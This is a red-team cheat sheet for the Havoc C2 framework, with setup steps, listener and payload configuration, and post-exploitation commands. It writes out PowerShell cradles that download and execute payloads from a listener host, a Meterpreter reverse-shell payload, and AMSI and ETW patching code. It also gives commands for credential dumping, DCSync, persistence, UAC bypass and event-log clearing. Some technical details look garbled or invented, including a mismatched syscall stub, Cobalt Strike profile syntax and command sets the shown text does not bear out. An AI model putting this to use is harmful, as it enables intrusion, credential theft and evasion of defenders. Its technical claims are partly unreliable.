Havoc C2 Framework Cheat Sheet

Overview

Havoc is a modern, malleable command and control (C2) framework designed for red team operations with a focus on operational security and evasion. Built with a modular architecture, Havoc provides advanced post-exploitation capabilities, supports multiple communication protocols, and offers extensive customization options for sophisticated adversary emulation.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.

Installation

Prerequisites

# Install dependencies (Ubuntu/Debian)
sudo apt update
sudo apt install -y build-essential cmake pkg-config libssl-dev libpq-dev python3-dev python3-pip golang-go

# Install Qt5 development libraries
sudo apt install -y qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools

# Install Python dependencies
pip3 install --user PyQt5 requests

Build from Source

# Clone Havoc repository
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc

# Build teamserver
cd teamserver
go mod download
make

# Build client
cd ../client
make

# Verify build
ls -la bin/

Docker Installation

# Clone repository
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc

# Build Docker image
docker build -t havoc-teamserver -f teamserver/Dockerfile .

# Run teamserver container
docker run -d --name havoc-ts -p 40056:40056 -p 443:443 -p 80:80 havoc-teamserver

# Build client Docker image
docker build -t havoc-client -f client/Dockerfile .

# Run client container
docker run -it --name havoc-client -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix havoc-client

Kali Linux Installation

# Install from Kali repositories (if available)
sudo apt update
sudo apt install havoc-c2

# Or build from source
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
sudo apt install -y build-essential cmake pkg-config libssl-dev qtbase5-dev
cd teamserver && make
cd ../client && make

Configuration

Teamserver Setup

# teamserver/profiles/havoc.yaotl
Teamserver:
  Host: "0.0.0.0"
  Port: 40056
  
  Build:
    Compiler64: "/usr/bin/x86_64-w64-mingw32-gcc"
    Compiler86: "/usr/bin/i686-w64-mingw32-gcc"
    Nasm: "/usr/bin/nasm"
    
  # SSL Configuration
  Certs:
    Cert: "data/x509-server.crt"
    Key: "data/x509-server.key"

Operators:
  - Name: "admin"
    Password: "password123"
    
  - Name: "operator1"
    Password: "redteam2024"

Listeners:
  - Name: "HTTP Listener"
    Protocol: "Http"
    Host: "192.168.1.100"
    Port: 80
    
  - Name: "HTTPS Listener"  
    Protocol: "Https"
    Host: "secure.example.com"
    Port: 443
    Cert: "data/cert.pem"
    Key: "data/key.pem"

SSL Certificate Generation

# Generate self-signed certificate
openssl req -new -x509 -keyout data/x509-server.key -out data/x509-server.crt -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=havoc-server"

# Generate certificate for HTTPS listener
openssl req -new -x509 -keyout data/cert.pem -out data/cert.pem -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=secure.example.com"

# Set proper permissions
chmod 600 data/*.key data/*.pem

Malleable C2 Profile

# profiles/amazon.profile
set sample_name "Amazon";

set sleeptime "30000";
set jitter    "20";
set maxdns    "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36";

http-get {
    set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";
    
    client {
        header "Host" "www.amazon.com";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Accept-Encoding" "gzip, deflate";
        header "Connection" "keep-alive";
        
        metadata {
            base64url;
            parameter "field-keywords";
        }
    }
    
    server {
        header "Server" "Server";
        header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
        header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVqZmduZXJlaGZ0b2VoZmQ=";
        
        output {
            netbios;
            prepend "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">";
            prepend "<html><head><title>Amazon.com: Online Shopping for Electronics, Apparel, Computers, Books, DVDs & more</title>";
            append "</html>";
            print;
        }
    }
}

http-post {
    set uri "/N4215/adj/amzn.us.sr.aps";
    
    client {
        header "Host" "www.amazon.com";
        header "Accept" "*/*";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Accept-Encoding" "gzip, deflate";
        header "Content-Type" "text/xml";
        header "Connection" "keep-alive";
        
        id {
            base64url;
            parameter "sz";
        }
        
        output {
            base64url;
            parameter "tile";
        }
    }
    
    server {
        header "Server" "Server";
        
        output {
            netbios;
            prepend "0";
            append "";
            print;
        }
    }
}

Basic Usage

Starting Teamserver

# Start teamserver with default profile
cd teamserver
./teamserver -profile profiles/havoc.yaotl

# Start with custom profile
./teamserver -profile profiles/custom.yaotl

# Start with debug mode
./teamserver -profile profiles/havoc.yaotl -debug

# Start with specific bind address
./teamserver -profile profiles/havoc.yaotl -bind 0.0.0.0:40056

Client Connection

# Start Havoc client
cd client
./Havoc

# Connect to teamserver
1. Enter teamserver details:
   - Host: 192.168.1.100
   - Port: 40056
   - Username: admin
   - Password: password123

2. Click Connect

Web Interface

# Access web interface (if enabled)
https://192.168.1.100:40056/web

# Default credentials
Username: admin
Password: password123

Listener Management

HTTP Listener

# Create HTTP listener via GUI
1. Navigate to Listeners tab
2. Click "Add Listener"
3. Configure parameters:
   - Name: HTTP-80
   - Protocol: HTTP
   - Host: 192.168.1.100
   - Port: 80
   - User Agent: Mozilla/5.0...
   - Headers: Custom headers

# Via configuration file
Listeners:
  - Name: "HTTP Listener"
    Protocol: "Http"
    Host: "192.168.1.100"
    Port: 80
    UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    Headers:
      - "Accept: text/html,application/xhtml+xml"
      - "Accept-Language: en-US,en;q=0.9"

HTTPS Listener

# Create HTTPS listener
1. Navigate to Listeners tab
2. Click "Add Listener"
3. Configure parameters:
   - Name: HTTPS-443
   - Protocol: HTTPS
   - Host: secure.example.com
   - Port: 443
   - Certificate: /path/to/cert.pem
   - Private Key: /path/to/key.pem
   - User Agent: Custom UA string

# Advanced HTTPS configuration
Listeners:
  - Name: "HTTPS Listener"
    Protocol: "Https"
    Host: "secure.example.com"
    Port: 443
    Cert: "certs/server.crt"
    Key: "certs/server.key"
    UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    Secure: true
    HSTS: true

SMB Listener

# Create SMB listener for lateral movement
1. Navigate to Listeners tab
2. Click "Add Listener"
3. Configure parameters:
   - Name: SMB-445
   - Protocol: SMB
   - Named Pipe: \\.\pipe\msagent_##
   - Host: 192.168.1.100
   - Port: 445

# SMB configuration
Listeners:
  - Name: "SMB Listener"
    Protocol: "Smb"
    PipeName: "msagent_ab"
    Host: "192.168.1.100"
    Port: 445

Payload Generation

Demon Agent (Windows)

# Generate Demon payload via GUI
1. Navigate to Payloads tab
2. Click "Generate Payload"
3. Configure parameters:
   - Agent: Demon
   - Listener: HTTP-80
   - Architecture: x64
   - Format: Windows Executable
   - Indirect Syscalls: Enabled
   - Sleep Obfuscation: Enabled

# Advanced Demon configuration
Payload:
  Agent: "Demon"
  Listener: "HTTP-80"
  Arch: "x64"
  Format: "Windows Executable"
  Config:
    Sleep: 5
    Jitter: 20
    IndirectSyscalls: true
    SleepObfuscation: true
    ProxyLoading: true
    AmsiBypass: true
    EtwBypass: true

Shellcode Generation

# Generate shellcode
1. Navigate to Payloads tab
2. Select "Generate Payload"
3. Configure parameters:
   - Agent: Demon
   - Listener: HTTPS-443
   - Format: Shellcode (bin)
   - Architecture: x64
   - Obfuscation: Enabled

# Use generated shellcode
# Inject into process
# Use with custom loaders
# Integrate with other frameworks

PowerShell Payload

# Generate PowerShell payload
1. Navigate to Payloads tab
2. Select "Generate Payload"
3. Configure parameters:
   - Agent: Demon
   - Listener: HTTP-80
   - Format: PowerShell
   - Obfuscation: Enabled

# Generated PowerShell example
$s='192.168.1.100';$p=80;$u='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
$wc=New-Object System.Net.WebClient;$wc.Headers.Add('User-Agent',$u);
$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;
$k=$wc.DownloadData("http://$s:$p/");IEX([System.Text.Encoding]::ASCII.GetString($k));

# Execute on target
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/payload.ps1')"

DLL Payload

# Generate DLL payload
1. Navigate to Payloads tab
2. Select "Generate Payload"
3. Configure parameters:
   - Agent: Demon
   - Listener: HTTPS-443
   - Format: Windows DLL
   - Architecture: x64
   - Export Function: DllMain

# Load DLL on target
rundll32.exe payload.dll,DllMain

# Or via PowerShell
[System.Reflection.Assembly]::LoadFile("C:\path\to\payload.dll")

Agent Management

Demon Agent Commands

# Basic system information
whoami                  # Current user context
hostname                # Computer name
pwd                     # Current directory
ls                      # List directory contents
cd [path]               # Change directory
cat [file]              # Read file contents
ps                      # List processes
env                     # Environment variables

# File operations
download [file]         # Download file from target
upload [local] [remote] # Upload file to target
mkdir [directory]       # Create directory
rm [file]               # Remove file
cp [source] [dest]      # Copy file
mv [source] [dest]      # Move file

Process Management

# Process operations
ps                      # List all processes
ps -u [user]            # List processes by user
kill [pid]              # Terminate process
killall [name]          # Kill processes by name

# Process injection
inject [pid] [shellcode] # Inject shellcode into process
hollowing [target] [payload] # Process hollowing
doppelganging [target] [payload] # Process doppelganging

# Token manipulation
steal_token [pid]       # Steal process token
make_token [user] [pass] [domain] # Create new token
rev2self                # Revert to original token

Credential Operations

# Credential harvesting
mimikatz [command]      # Execute Mimikatz commands
logonpasswords          # Dump logon passwords
lsadump                 # Dump LSA secrets
sam                     # Dump SAM database
cache                   # Dump cached credentials

# Kerberos attacks
kerberoast              # Kerberoasting attack
asreproast              # AS-REP roasting
dcsync [user]           # DCSync attack
golden [options]        # Golden ticket creation
silver [options]        # Silver ticket creation

Lateral Movement

# Remote execution
psexec [target] [command] # PSExec execution
wmiexec [target] [command] # WMI execution
smbexec [target] [command] # SMB execution
winrm [target] [command] # WinRM execution

# Credential-based movement
pth [hash] [target] [command] # Pass-the-hash
ptk [ticket] [target] [command] # Pass-the-ticket

# Service manipulation
sc [target] create [service] [binary] # Create service
sc [target] start [service] # Start service
sc [target] stop [service]  # Stop service
sc [target] delete [service] # Delete service

Advanced Features

SOCKS Proxy

# Start SOCKS proxy
socks start [port]      # Start SOCKS4/5 proxy on port
socks list              # List active SOCKS proxies
socks stop [id]         # Stop SOCKS proxy

# Use with external tools
proxychains -f /etc/proxychains.conf nmap -sT 192.168.1.0/24
proxychains firefox
proxychains msfconsole

Port Forwarding

# Local port forwarding
portfwd add [local_port] [remote_host] [remote_port]
portfwd list            # List active port forwards
portfwd remove [id]     # Remove port forward

# Reverse port forwarding
rportfwd add [remote_port] [local_host] [local_port]
rportfwd list           # List reverse port forwards
rportfwd remove [id]    # Remove reverse port forward

Persistence Mechanisms

# Registry persistence
persist registry [key] [value] [payload] # Registry autorun
persist startup [name] [payload] # Startup folder
persist service [name] [payload] # Windows service

# Scheduled task persistence
persist schtask [name] [trigger] [payload] # Scheduled task
persist wmi [filter] [consumer] [payload] # WMI event subscription

# Advanced persistence
persist com [clsid] [payload] # COM hijacking
persist dll [target] [payload] # DLL hijacking

Privilege Escalation

# UAC bypass techniques
uacbypass [method] [payload] # Various UAC bypass methods
eventvwr [payload]      # Event Viewer UAC bypass
fodhelper [payload]     # FodHelper UAC bypass
computerdefaults [payload] # Computer Defaults UAC bypass

# Kernel exploits
exploit ms16-032 [payload] # Secondary Logon Handle EoP
exploit ms16-135 [payload] # Windows Kernel-Mode Drivers EoP
exploit cve-2021-1675 [payload] # PrintNightmare

Data Exfiltration

# File exfiltration
exfil http [file] [url] # HTTP exfiltration
exfil dns [file] [domain] # DNS exfiltration
exfil smb [file] [share] # SMB exfiltration

# Database exfiltration
exfil sql [connection] [query] # SQL database exfiltration
exfil ldap [server] [query] # LDAP exfiltration

# Steganography
exfil stego [file] [image] # Hide data in image
exfil stego [file] [audio] # Hide data in audio

Evasion Techniques

AMSI Bypass

// AMSI bypass implementation in Demon
public static void BypassAMSI()
{
    try
    {
        var amsiDll = LoadLibrary("amsi.dll");
        var amsiScanBuffer = GetProcAddress(amsiDll, "AmsiScanBuffer");
        
        var patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
        var oldProtect = VirtualProtect(amsiScanBuffer, (UIntPtr)patch.Length, 0x40, out uint _);
        Marshal.Copy(patch, 0, amsiScanBuffer, patch.Length);
        VirtualProtect(amsiScanBuffer, (UIntPtr)patch.Length, oldProtect, out uint _);
    }
    catch (Exception ex)
    {
        // Handle exception
    }
}

ETW Bypass

// ETW bypass implementation
public static void BypassETW()
{
    try
    {
        var ntdll = LoadLibrary("ntdll.dll");
        var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
        
        var patch = new byte[] { 0xC3 }; // ret instruction
        var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
        Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
        VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
    }
    catch (Exception ex)
    {
        // Handle exception
    }
}

Sleep Obfuscation

// Sleep obfuscation in Demon agent
void SleepObfuscation(DWORD dwMilliseconds)
{
    CONTEXT ctx = { 0 };
    HANDLE hTimer = NULL;
    LARGE_INTEGER liDueTime = { 0 };
    
    // Create waitable timer
    hTimer = CreateWaitableTimer(NULL, TRUE, NULL);
    if (!hTimer) return;
    
    // Set timer
    liDueTime.QuadPart = -10000LL * dwMilliseconds;
    SetWaitableTimer(hTimer, &liDueTime, 0, NULL, NULL, FALSE);
    
    // Encrypt agent in memory
    EncryptAgent();
    
    // Wait for timer
    WaitForSingleObject(hTimer, INFINITE);
    
    // Decrypt agent
    DecryptAgent();
    
    CloseHandle(hTimer);
}

Indirect Syscalls

; Indirect syscall implementation
.code

IndirectSyscall PROC
    mov r10, rcx
    mov eax, edx
    jmp qword ptr [r8]
IndirectSyscall ENDP

; Usage in C
NTSTATUS IndirectNtAllocateVirtualMemory(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
)
{
    return IndirectSyscall(ProcessHandle, 0x18, SyscallAddress);
}

Automation and Scripting

Python Automation

# Havoc automation script
import requests
import json
import time

class HavocAPI:
    def __init__(self, host, port, username, password):
        self.base_url = f"https://{host}:{port}/api"
        self.session = requests.Session()
        self.session.verify = False
        self.authenticate(username, password)
    
    def authenticate(self, username, password):
        auth_data = {
            "username": username,
            "password": password
        }
        response = self.session.post(f"{self.base_url}/auth", json=auth_data)
        if response.status_code == 200:
            self.token = response.json()["token"]
            self.session.headers.update({"Authorization": f"Bearer {self.token}"})
    
    def get_demons(self):
        response = self.session.get(f"{self.base_url}/demons")
        return response.json()
    
    def execute_command(self, demon_id, command):
        task_data = {
            "demon_id": demon_id,
            "command": command
        }
        response = self.session.post(f"{self.base_url}/tasks", json=task_data)
        return response.json()
    
    def automated_recon(self, demon_id):
        """Automated reconnaissance on new demon"""
        commands = [
            "whoami",
            "hostname",
            "pwd",
            "ps",
            "netstat -an",
            "ipconfig /all",
            "systeminfo"
        ]
        
        for cmd in commands:
            print(f"[+] Executing: {cmd}")
            result = self.execute_command(demon_id, cmd)
            time.sleep(2)
        
        # Credential harvesting if elevated
        if self.is_elevated(demon_id):
            self.execute_command(demon_id, "mimikatz logonpasswords")

# Usage
havoc = HavocAPI("192.168.1.100", 40056, "admin", "password123")
demons = havoc.get_demons()

for demon in demons:
    if demon["status"] == "active":
        havoc.automated_recon(demon["id"])

PowerShell Automation

# PowerShell automation for Havoc
function Invoke-HavocAutomation {
    param(
        [string]$HavocServer = "192.168.1.100",
        [int]$Port = 40056,
        [string]$Username = "admin",
        [string]$Password = "password123"
    )
    
    # Authenticate to Havoc API
    $authData = @{
        username = $Username
        password = $Password
    } | ConvertTo-Json
    
    $authResponse = Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/auth" -Method POST -Body $authData -ContentType "application/json" -SkipCertificateCheck
    $token = $authResponse.token
    
    $headers = @{
        "Authorization" = "Bearer $token"
        "Content-Type" = "application/json"
    }
    
    # Get active demons
    $demons = Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/demons" -Headers $headers -SkipCertificateCheck
    
    foreach ($demon in $demons) {
        if ($demon.status -eq "active") {
            Write-Host "[+] Processing demon: $($demon.id)"
            
            # Execute reconnaissance commands
            $commands = @("whoami", "hostname", "ps", "netstat -an")
            foreach ($cmd in $commands) {
                $taskData = @{
                    demon_id = $demon.id
                    command = $cmd
                } | ConvertTo-Json
                
                Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/tasks" -Method POST -Body $taskData -Headers $headers -SkipCertificateCheck
                Start-Sleep -Seconds 2
            }
        }
    }
}

# Execute automation
Invoke-HavocAutomation

Bash Automation

#!/bin/bash

# Havoc automation script
HAVOC_SERVER="192.168.1.100"
HAVOC_PORT="40056"
USERNAME="admin"
PASSWORD="password123"

# Authenticate and get token
TOKEN=$(curl -s -k -X POST "https://$HAVOC_SERVER:$HAVOC_PORT/api/auth" \
    -H "Content-Type: application/json" \
    -d "{\"username\":\"$USERNAME\",\"password\":\"$PASSWORD\"}" | \
    jq -r '.token')

# Function to execute command on demon
execute_command() {
    local demon_id=$1
    local command=$2
    
    curl -s -k -X POST "https://$HAVOC_SERVER:$HAVOC_PORT/api/tasks" \
        -H "Authorization: Bearer $TOKEN" \
        -H "Content-Type: application/json" \
        -d "{\"demon_id\":\"$demon_id\",\"command\":\"$command\"}"
}

# Get active demons
DEMONS=$(curl -s -k -H "Authorization: Bearer $TOKEN" \
    "https://$HAVOC_SERVER:$HAVOC_PORT/api/demons" | \
    jq -r '.[] | select(.status=="active") | .id')

# Execute commands on each demon
for demon_id in $DEMONS; do
    echo "[+] Processing demon: $demon_id"
    
    # Reconnaissance commands
    commands=("whoami" "hostname" "ps" "netstat -an" "ipconfig")
    
    for cmd in "${commands[@]}"; do
        echo "[+] Executing: $cmd"
        execute_command "$demon_id" "$cmd"
        sleep 2
    done
done

Integration with Other Tools

Metasploit Integration

# Use Havoc with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe

# Upload via Havoc demon
upload meterpreter.exe C:\Windows\Temp\update.exe

# Execute Metasploit payload
shell C:\Windows\Temp\update.exe

# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run

Cobalt Strike Integration

# Beacon integration
# Generate Cobalt Strike beacon
# Use Havoc for initial access, pivot to Beacon

# From Havoc demon
shell powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"

# Handle in Cobalt Strike team server

BloodHound Integration

# Collect BloodHound data via Havoc
# Upload SharpHound to target
upload SharpHound.exe C:\Windows\Temp\collector.exe

# Run BloodHound collection
shell C:\Windows\Temp\collector.exe -c All -d domain.local

# Download collected data
download C:\Windows\Temp\*BloodHound.zip

# Import into BloodHound
neo4j start
./BloodHound --no-sandbox

Operational Security

Communication Security

# Domain fronting configuration
# Configure CDN (CloudFlare, AWS CloudFront)
# Set up domain fronting rules
# Update listener configuration

# Certificate management
# Use legitimate SSL certificates
# Implement certificate pinning
# Regular certificate rotation

Traffic Obfuscation

# Malleable C2 profiles
# Mimic legitimate applications
# Use realistic timing and jitter
# Implement traffic shaping

# Custom user agents
# Match target environment
# Use legitimate application signatures
# Implement user agent rotation

Anti-Forensics

# Event log clearing
shell wevtutil cl System
shell wevtutil cl Security
shell wevtutil cl Application

# Timestomping
shell powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"

# Memory cleanup
# Implement secure memory wiping
# Use process migration
# Clear command history

Troubleshooting

Common Issues

# Demon not connecting
1. Check firewall rules
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference

# SSL certificate issues
# Regenerate certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

# Performance issues
# Increase demon sleep time
# Optimize task execution
# Use multiple listeners

Debug Mode

# Enable debug logging
./teamserver -profile profiles/havoc.yaotl -debug

# Check logs
tail -f logs/teamserver.log

# Network troubleshooting
# Use Wireshark to analyze traffic
# Check for network filtering
# Verify DNS resolution

Database Issues

# Reset database
rm -rf data/havoc.db
./teamserver -profile profiles/havoc.yaotl

# Backup database
cp data/havoc.db data/havoc.db.backup

# Restore database
cp data/havoc.db.backup data/havoc.db

Best Practices

Operational Planning

1. Pre-engagement setup: Configure profiles and listeners before engagement
2. Team coordination: Use operator management for team collaboration
3. Communication protocols: Establish clear C2 communication channels
4. Data handling: Implement secure data collection and exfiltration
5. Cleanup procedures: Plan for artifact removal and operational cleanup

Security Considerations

# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates

# Agent management
# Use unique agent configurations
# Implement kill dates
# Regular agent rotation
# Secure communication channels

Documentation and Reporting

# Operation documentation
# Maintain detailed logs
# Document all activities
# Track compromised systems
# Generate executive reports

# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention

Resources

• Havoc GitHub Repository
• Havoc Documentation
• Havoc Community Discord
• Red Team Village Havoc Training
• SANS Red Team Operations

---

This cheat sheet provides a comprehensive reference for using Havoc C2 framework. Always ensure you have proper authorization before conducting red team operations or penetration testing.